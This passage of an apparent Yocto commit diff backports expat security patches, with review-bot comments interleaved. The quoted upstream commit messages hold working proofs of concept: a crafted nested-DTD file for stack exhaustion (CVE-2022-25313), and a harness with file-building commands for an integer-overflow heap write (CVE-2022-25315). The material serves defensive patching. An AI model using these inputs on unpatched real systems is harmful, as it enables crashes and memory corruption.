++ * - Before the loop starts, jobDest writes source array index 0
++ * (where the root node is located) so that dest will have something to do
++ * when it starts operation.
++ *
++ * - Whenever nodes with children are encountered, jobDest appends
++ * them as new jobs, in order. As a result, tree node siblings are
++ * adjacent in the resulting array, for example:
++ *
++ * [0] root, has two children
++ * [1] first child of 0, has three children
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ * [2] second child of 0, does not have children
++ *
++ * Or (the same data) presented in flat array view:
++ *
++ * [0] root, has two children
++ *
++ * [1] first child of 0, has three children
++ * [2] second child of 0, does not have children
++ *
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ *
++ * - The algorithm repeats until all target array indices have been processed.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+- XML_Content *const stackBottom = &ret[dtd->scaffCount];
+- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ XML_Content *jobDest = ret; /* next free writing location in target array */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+- /* Push source tree root node index onto the stack */
+- (--stackTop)->numchildren = 0;
++ /* Add the starting job, the root node (index 0) of the source tree */
++ (jobDest++)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+- /* Pop source tree node index off the stack */
+- const int src_node = (int)(stackTop++)->numchildren;
++ /* Retrieve source tree array index from job storage */
++ const int src_node = (int)dest->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = &dest[1];
++ dest->children = jobDest;
+
+- /* Push children to the stack
+- * in a way where the first child ends up at the top of the
+- * (downwards growing) stack, in order to be processed first. */
+- stackTop -= dest->numchildren;
++ /* Append scaffold indices of children to array */
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+- (stackTop + i)->numchildren = (unsigned int)cn;
+- }
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
++ (jobDest++)->numchildren = (unsigned int)cn;
+ }
+ }
+
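Review bot: Unlike the other expat patches added in this commit, this one has no `Upstream-Status`, `CVE` or backporter `Signed-off-by` line between the description and the `---` separator, so its origin and the CVE it belongs to are recorded only in the file name. I would add `Upstream-Status: Backport [<upstream commit URL>]`, `CVE: CVE-2022-25313` and the backporter's `Signed-off-by:` line after `Co-authored-by:`. That keeps this regression fix traceable to upstream commit b12f34fe32821a69dc12ff9a021daca0856de238 in the same way as the fix it corrects.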
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
+From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:54:29 +0000
+Subject: [PATCH] Prevent stack exhaustion in build_model
+
+It is possible to trigger stack exhaustion in build_model function if
+depth of nested children in DTD element is large enough. This happens
+because build_node is a recursively called function within build_model.
+
+The code has been adjusted to run iteratively. It uses the already
+allocated heap space as temporary stack (growing from top to bottom).
+
+Output is identical to recursive version. No new fields in data
+structures were added, i.e. it keeps full API and ABI compatibility.
+Instead the numchildren variable is used to temporarily keep the
+index of items (uint vs int).
+
+Documentation and readability improvements kindly added by Sebastian.
+
+Proof of Concept:
+
+1. Compile poc binary which parses XML file line by line
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdio.h>
+
+ XML_Parser parser;
+
+ static void XMLCALL
+ dummy_element_decl_handler(void *userData, const XML_Char *name,
+ XML_Content *model) {
+ XML_FreeContentModel(parser, model);
+ }
+
+ int main(int argc, char *argv[]) {
+ FILE *fp;
+ char *p = NULL;
+ size_t s = 0;
+ ssize_t l;
+ if (argc != 2)
+ errx(1, "usage: poc poc.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "XML_ParserCreate");
+ XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
+ if ((fp = fopen(argv[1], "r")) == NULL)
+ err(1, "fopen");
+ while ((l = getline(&p, &s, fp)) > 0)
+ if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
+ errx(1, "XML_Parse");
+ XML_ParserFree(parser);
+ free(p);
+ fclose(fp);
+ return 0;
+ }
+EOF
+cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
+```
+
+2. Create XML file with a lot of nested groups in DTD element
+
+```
+cat > poc.xml.zst.b64 << EOF
+KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
+ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
+ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
+EOF
+base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
+```
+
+3. Run Proof of Concept
+
+```
+./poc poc.xml
+```
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
+
+CVE: CVE-2022-25313
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
+ 1 file changed, 79 insertions(+), 37 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..594cf12c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
+ return next;
+ }
+
+-static void
+-build_node(XML_Parser parser, int src_node, XML_Content *dest,
+- XML_Content **contpos, XML_Char **strpos) {
+- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+- dest->type = dtd->scaffold[src_node].type;
+- dest->quant = dtd->scaffold[src_node].quant;
+- if (dest->type == XML_CTYPE_NAME) {
+- const XML_Char *src;
+- dest->name = *strpos;
+- src = dtd->scaffold[src_node].name;
+- for (;;) {
+- *(*strpos)++ = *src;
+- if (! *src)
+- break;
+- src++;
+- }
+- dest->numchildren = 0;
+- dest->children = NULL;
+- } else {
+- unsigned int i;
+- int cn;
+- dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = *contpos;
+- *contpos += dest->numchildren;
+- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
+- i++, cn = dtd->scaffold[cn].nextsib) {
+- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
+- }
+- dest->name = NULL;
+- }
+-}
+-
+ static XML_Content *
+ build_model(XML_Parser parser) {
++ /* Function build_model transforms the existing parser->m_dtd->scaffold
++ * array of CONTENT_SCAFFOLD tree nodes into a new array of
++ * XML_Content tree nodes followed by a gapless list of zero-terminated
++ * strings. */
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ XML_Content *ret;
+- XML_Content *cpos;
+- XML_Char *str;
++ XML_Char *str; /* the current string writing location */
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
+ if (! ret)
+ return NULL;
+
+- str = (XML_Char *)(&ret[dtd->scaffCount]);
+- cpos = &ret[1];
++ /* What follows is an iterative implementation (of what was previously done
++ * recursively in a dedicated function called "build_node". The old recursive
++ * build_node could be forced into stack exhaustion from input as small as a
++ * few megabyte, and so that was a security issue. Hence, a function call
++ * stack is avoided now by resolving recursion.)
++ *
++ * The iterative approach works as follows:
++ *
++ * - We use space in the target array for building a temporary stack structure
++ * while that space is still unused.
++ * The stack grows from the array's end downwards and the "actual data"
++ * grows from the start upwards, sequentially.
++ * (Because stack grows downwards, pushing onto the stack is a decrement
++ * while popping off the stack is an increment.)
++ *
++ * - A stack element appears as a regular XML_Content node on the outside,
++ * but only uses a single field -- numchildren -- to store the source
++ * tree node array index. These are the breadcrumbs leading the way back
++ * during pre-order (node first) depth-first traversal.
++ *
++ * - The reason we know the stack will never grow into (or overlap with)
++ * the area with data of value at the start of the array is because
++ * the overall number of elements to process matches the size of the array,
++ * and the sum of fully processed nodes and yet-to-be processed nodes
++ * on the stack, cannot be more than the total number of nodes.
++ * It is possible for the top of the stack and the about-to-write node
++ * to meet, but that is safe because we get the source index out
++ * before doing any writes on that node.
++ */
++ XML_Content *dest = ret; /* tree node writing location, moves upwards */
++ XML_Content *const destLimit = &ret[dtd->scaffCount];
++ XML_Content *const stackBottom = &ret[dtd->scaffCount];
++ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ str = (XML_Char *)&ret[dtd->scaffCount];
++
++ /* Push source tree root node index onto the stack */
++ (--stackTop)->numchildren = 0;
++
++ for (; dest < destLimit; dest++) {
++ /* Pop source tree node index off the stack */
++ const int src_node = (int)(stackTop++)->numchildren;
++
++ /* Convert item */
++ dest->type = dtd->scaffold[src_node].type;
++ dest->quant = dtd->scaffold[src_node].quant;
++ if (dest->type == XML_CTYPE_NAME) {
++ const XML_Char *src;
++ dest->name = str;
++ src = dtd->scaffold[src_node].name;
++ for (;;) {
++ *str++ = *src;
++ if (! *src)
++ break;
++ src++;
++ }
++ dest->numchildren = 0;
++ dest->children = NULL;
++ } else {
++ unsigned int i;
++ int cn;
++ dest->name = NULL;
++ dest->numchildren = dtd->scaffold[src_node].childcnt;
++ dest->children = &dest[1];
++
++ /* Push children to the stack
++ * in a way where the first child ends up at the top of the
++ * (downwards growing) stack, in order to be processed first. */
++ stackTop -= dest->numchildren;
++ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
++ (stackTop + i)->numchildren = (unsigned int)cn;
++ }
++ }
++ }
+
+- build_node(parser, 0, ret, &cpos, &str);
+ return ret;
+ }
+
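Review bot: `dest->children = &dest[1];` in the new loop assumes that a node's children sit directly behind it, but the loop writes nodes in pre-order. Once a first child has children of its own, the second child is no longer at `children[1]`, whereas the removed build_node reserved a contiguous run with `*contpos += dest->numchildren`. The patch just before this one in the diff, presumably the CVE-2022-25313-regression.patch that the recipe lists next in SRC_URI, replaces that line with `dest->children = jobDest;`, so the series as a whole looks right. This file alone is not, and its header still says the output is identical to the recursive version. I would add a header line such as `Comment: incomplete without CVE-2022-25313-regression.patch, apply both together` so it is never picked on its own.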
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+- int charsRequired = 0;
++ size_t charsRequired = 0;
+ XML_Char *result;
+
+ /* First determine how long the string is */
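Review bot: The `Upstream-Status: Backport` line in this header carries its URL on the following line instead of in brackets on the same line, unlike CVE-2022-40674.patch and CVE-2022-43680.patch in the same directory; CVE-2022-25313.patch and CVE-2022-25315.patch share the layout. Anything that reads the tag line by line will not see the reference, so I would write `Upstream-Status: Backport [https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd]`. The code change itself only widens the declaration; the counting loop and the allocation that use `charsRequired` are outside the hunk.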
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
+From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:55:46 +0000
+Subject: [PATCH] Prevent integer overflow in storeRawNames
+
+It is possible to use an integer overflow in storeRawNames for out of
+boundary heap writes. Default configuration is affected. If compiled
+with XML_UNICODE then the attack does not work. Compiling with
+-fsanitize=address confirms the following proof of concept.
+
+The problem can be exploited by abusing the m_buffer expansion logic.
+Even though the initial size of m_buffer is a power of two, eventually
+it can end up a little bit lower, thus allowing allocations very close
+to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
+names can be parsed which are almost INT_MAX in size.
+
+Unfortunately (from an attacker point of view) INT_MAX/2 is also a
+limitation in string pools. Having a tag name of INT_MAX/2 characters
+or more is not possible.
+
+Expat can convert between different encodings. UTF-16 documents which
+contain only ASCII representable characters are twice as large as their
+ASCII encoded counter-parts.
+
+The proof of concept works by taking these three considerations into
+account:
+
+1. Move the m_buffer size slightly below a power of two by having a
+ short root node <a>. This allows the m_buffer to grow very close
+ to INT_MAX.
+2. The string pooling forbids tag names longer than or equal to
+ INT_MAX/2, so keep the attack tag name smaller than that.
+3. To be able to still overflow INT_MAX even though the name is
+ limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
+ which only contains ASCII characters. UTF-16 always stores two
+ bytes per character while the tag name is converted to using only
+ one. Our attack node byte count must be a bit higher than
+ 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
+ in sum can overflow INT_MAX.
+
+Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
+without running into INT_MAX boundary check. The string pooling is
+able to store INT_MAX/3 as tag name because the amount is below
+INT_MAX/2 limitation. And creating the sum of both eventually overflows
+in storeRawNames.
+
+Proof of Concept:
+
+1. Compile expat with -fsanitize=address.
+
+2. Create Proof of Concept binary which iterates through input
+ file 16 MB at once for better performance and easier integer
+ calculations:
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdlib.h>
+ #include <stdio.h>
+
+ #define CHUNK (16 * 1024 * 1024)
+ int main(int argc, char *argv[]) {
+ XML_Parser parser;
+ FILE *fp;
+ char *buf;
+ int i;
+
+ if (argc != 2)
+ errx(1, "usage: poc file.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "failed to create expat parser");
+ if ((fp = fopen(argv[1], "r")) == NULL) {
+ XML_ParserFree(parser);
+ err(1, "failed to open file");
+ }
+ if ((buf = malloc(CHUNK)) == NULL) {
+ fclose(fp);
+ XML_ParserFree(parser);
+ err(1, "failed to allocate buffer");
+ }
+ i = 0;
+ while (fread(buf, CHUNK, 1, fp) == 1) {
+ printf("iteration %d: XML_Parse returns %d\n", ++i,
+ XML_Parse(parser, buf, CHUNK, XML_FALSE));
+ }
+ free(buf);
+ fclose(fp);
+ XML_ParserFree(parser);
+ return 0;
+ }
+EOF
+gcc -fsanitize=address -lexpat -o poc poc.c
+```
+
+3. Construct specially prepared UTF-16 XML file:
+
+```
+dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
+echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
+echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
+iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
+```
+
+4. Run proof of concept:
+
+```
+./poc poc-utf16.xml
+```
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
+
+CVE: CVE-2022-25315
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ lib/xmlparse.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..f34d6ab5 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
+ while (tag) {
+ int bufSize;
+ int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
++ size_t rawNameLen;
+ char *rawNameBuf = tag->buf + nameLen;
+ /* Stop if already stored. Since m_tagStack is a stack, we can stop
+ at the first entry that has already been copied; everything
+@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
+ /* For re-use purposes we need to ensure that the
+ size of tag->buf is a multiple of sizeof(XML_Char).
+ */
+- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ /* Detect and prevent integer overflow. */
++ if (rawNameLen > (size_t)INT_MAX - nameLen)
++ return XML_FALSE;
++ bufSize = nameLen + (int)rawNameLen;
+ if (bufSize > tag->bufEnd - tag->buf) {
+ char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
+ if (temp == NULL)
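Review bot: The new guard `rawNameLen > (size_t)INT_MAX - nameLen` is only sound while `nameLen` is non-negative, and `nameLen` on the context line above is still an `int` assigned from `sizeof(XML_Char) * (tag->name.strLen + 1)`. The commit message relies on the string pool keeping names below INT_MAX/2 characters, which bounds it for a one-byte XML_Char; whether the same holds for XML_UNICODE builds cannot be seen from here. I would state the assumption next to the check, e.g. `/* nameLen is non-negative and bounded by the string pool's name length limit */`, or confirm it and reject `nameLen < 0` explicitly. storeRawNames starts and ends outside the hunk.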
diff --git a/meta/recipes-core/expat/expat/CVE-2022-40674.patch b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
new file mode 100644
index 0000000000..8b95f5f198
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
+From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
+From: Rhodri James <rhodri@wildebeest.org.uk>
+Date: Wed, 17 Aug 2022 18:26:18 +0100
+Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
+
+It is possible to concoct a situation in which parsing is
+suspended while substituting in an internal entity, so that
+XML_ResumeParser directly uses internalEntityProcessor as
+its processor. If the subsequent parse includes some unclosed
+tags, this will return without calling storeRawNames to ensure
+that the raw versions of the tag names are stored in memory other
+than the parse buffer itself. If the parse buffer is then changed
+or reallocated (for example if processing a file line by line),
+badness will ensue.
+
+This patch ensures storeRawNames is always called when needed
+after calling doContent. The earlier call do doContent does
+not need the same protection; it only deals with entity
+substitution, which cannot leave unbalanced tags, and in any
+case the raw names will be pointing into the stored entity
+value not the parse buffer.
+
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
+CVE: CVE-2022-40674
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ expat/lib/xmlparse.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+Index: expat/lib/xmlparse.c
+===================================================================
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
+ {
+ parser->m_processor = contentProcessor;
+ /* see externalEntityContentProcessor vs contentProcessor */
+- return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+- s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer,
+- XML_ACCOUNT_DIRECT);
++ result = doContent(parser, parser->m_parentParser ? 1 : 0,
++ parser->m_encoding, s, end, nextPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
++ if (result == XML_ERROR_NONE) {
++ if (! storeRawNames(parser))
++ return XML_ERROR_NO_MEMORY;
++ }
++ return result;
+ }
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-43680.patch b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
new file mode 100644
index 0000000000..6f93bc3ed7
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
+From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 20 Sep 2022 02:44:34 +0200
+Subject: [PATCH] lib: Fix overeager DTD destruction in
+ XML_ExternalEntityParserCreate
+
+CVE: CVE-2022-43680
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comments: Hunk refreshed
+---
+ lib/xmlparse.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index aacd6e7fc..57bf103cc 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
+ parserInit(parser, encodingName);
+
+ if (encodingName && ! parser->m_protocolEncodingName) {
++ if (dtd) {
++ // We need to stop the upcoming call to XML_ParserFree from happily
++ // destroying parser->m_dtd because the DTD is shared with the parent
++ // parser and the only guard that keeps XML_ParserFree from destroying
++ // parser->m_dtd is parser->m_isParamEntity but it will be set to
++ // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
++ parser->m_dtd = NULL;
++ }
+ XML_ParserFree(parser);
+ return NULL;
+ }
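Review bot: Clearing `parser->m_dtd` just before `XML_ParserFree(parser)` is safe only if XML_ParserFree in this 2.2.9 tree skips the DTD teardown when `m_dtd` is NULL, and that function is outside the hunk. The header says the hunk was refreshed against an older base, so I would confirm the NULL check exists there and say so in the header, e.g. `Comments: Hunk refreshed; XML_ParserFree in 2.2.9 tolerates m_dtd == NULL`. parserCreate itself starts and ends outside the hunk.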
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
-From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001
-From: Khem Raj <raj.khem@gmail.com>
-Date: Thu, 2 Nov 2017 18:20:57 +0800
+From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
+From: Jasper Orschulko <jasper@fancydomain.eu>
+Date: Wed, 16 Jun 2021 19:00:30 +0200
Subject: [PATCH] Add CC tag to build
-Add CC tag to build
-
Upstream-Status: Pending
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
---
- Makefile.in | 2 +-
+ Makefile.am | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
-diff --git a/Makefile.in b/Makefile.in
-index 9560a95..d444bd6 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@
- LIBOBJS = @LIBOBJS@
- LIBREVISION = @LIBREVISION@
- LIBS = @LIBS@
--LIBTOOL = @LIBTOOL@
-+LIBTOOL = @LIBTOOL@ --tag CC
- LIPO = @LIPO@
- LN_S = @LN_S@
- LTLIBOBJS = @LTLIBOBJS@
+diff --git a/Makefile.am b/Makefile.am
+index 5e1d37dd..f7a6dece 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
+ subdir-objects
+
+ ACLOCAL_AMFLAGS = -I m4
+-LIBTOOLFLAGS = --verbose
++LIBTOOLFLAGS = --verbose --tag=CC
+
+ SUBDIRS = lib # lib goes first to build first
+ if WITH_EXAMPLES
--
-2.7.4
+2.32.0
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
SUMMARY = "A stream-oriented XML parser library"
DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
-HOMEPAGE = "http://expat.sourceforge.net/"
+HOMEPAGE = "https://github.com/libexpat/libexpat"
SECTION = "libs"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
-SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \
+SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
+ file://CVE-2013-0340.patch \
+ file://CVE-2021-45960.patch \
+ file://CVE-2021-46143.patch \
+ file://CVE-2022-22822-27.patch \
+ file://CVE-2022-23852.patch \
+ file://CVE-2022-23990.patch \
+ file://CVE-2022-25235.patch \
+ file://CVE-2022-25236.patch \
+ file://CVE-2022-25313.patch \
+ file://CVE-2022-25313-regression.patch \
+ file://CVE-2022-25314.patch \
+ file://CVE-2022-25315.patch \
file://libtool-tag.patch \
- "
+ file://CVE-2022-40674.patch \
+ file://CVE-2022-43680.patch \
+ "
-SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5"
-SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
+SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
inherit autotools lib_package
-do_configure_prepend () {
- rm -f ${S}/conftools/libtool.m4
-}
+S = "${WORKDIR}/git/expat"
BBCLASSEXTEND = "native nativesdk"
+
+CVE_PRODUCT = "expat libexpat"
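Review bot: `SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"` replaces the tarball and its `SRC_URI[sha256sum]` without saying which upstream release that commit is, while the recipe file name still fixes the version at 2.2.9. Version-based CVE matching and anyone auditing the fifteen patches in SRC_URI depend on the hash really being that release. I would put a comment above it, e.g. `# SRCREV is the upstream commit tagged as release 2.2.9`, after checking that this is the case.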
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
SUMMARY = "Implementation of ftsfor musl libc packages"
HOMEPAGE = "https://github.com/pullmoll/musl-fts"
+DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
SECTION = "libs"
SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
-SRC_URI = "git://github.com/pullmoll/musl-fts.git"
+SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
new file mode 100644
index 0000000000..17dcada613
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
@@ -0,0 +1,41 @@
+From 63c5b62f0a984fac9a9700b12f54fe878e016a5d Mon Sep 17 00:00:00 2001
+From: Philip Withnall <withnall@endlessm.com>
+Date: Wed, 2 Sep 2020 12:38:09 +0100
+Subject: [PATCH] goption: Add a precondition to avoid GOptionEntry list
+ overflow
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If the calling code adds more option entries than `G_MAXSIZE` then
+there’ll be an integer overflow. This seems vanishingly unlikely (given
+that all callers use static option entry lists), but add a precondition
+anyway.
+
+Signed-off-by: Philip Withnall <withnall@endlessm.com>
+
+Fixes: #2197
+---
+ glib/goption.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+CVE: CVE-2020-35457
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/glib/-/commit/63c5b62f0a984fac9a9700b12f54fe878e016a5d]
+Comment: adjusted offset by -5 to fix patch fuzz warning
+
+diff --git a/glib/goption.c b/glib/goption.c
+index 9f5b977c4..bb9093a33 100644
+--- a/glib/goption.c
++++ b/glib/goption.c
+@@ -2417,6 +2417,8 @@ g_option_group_add_entries (GOptionGroup *group,
+
+ for (n_entries = 0; entries[n_entries].long_name != NULL; n_entries++) ;
+
++ g_return_if_fail (n_entries <= G_MAXSIZE - group->n_entries);
++
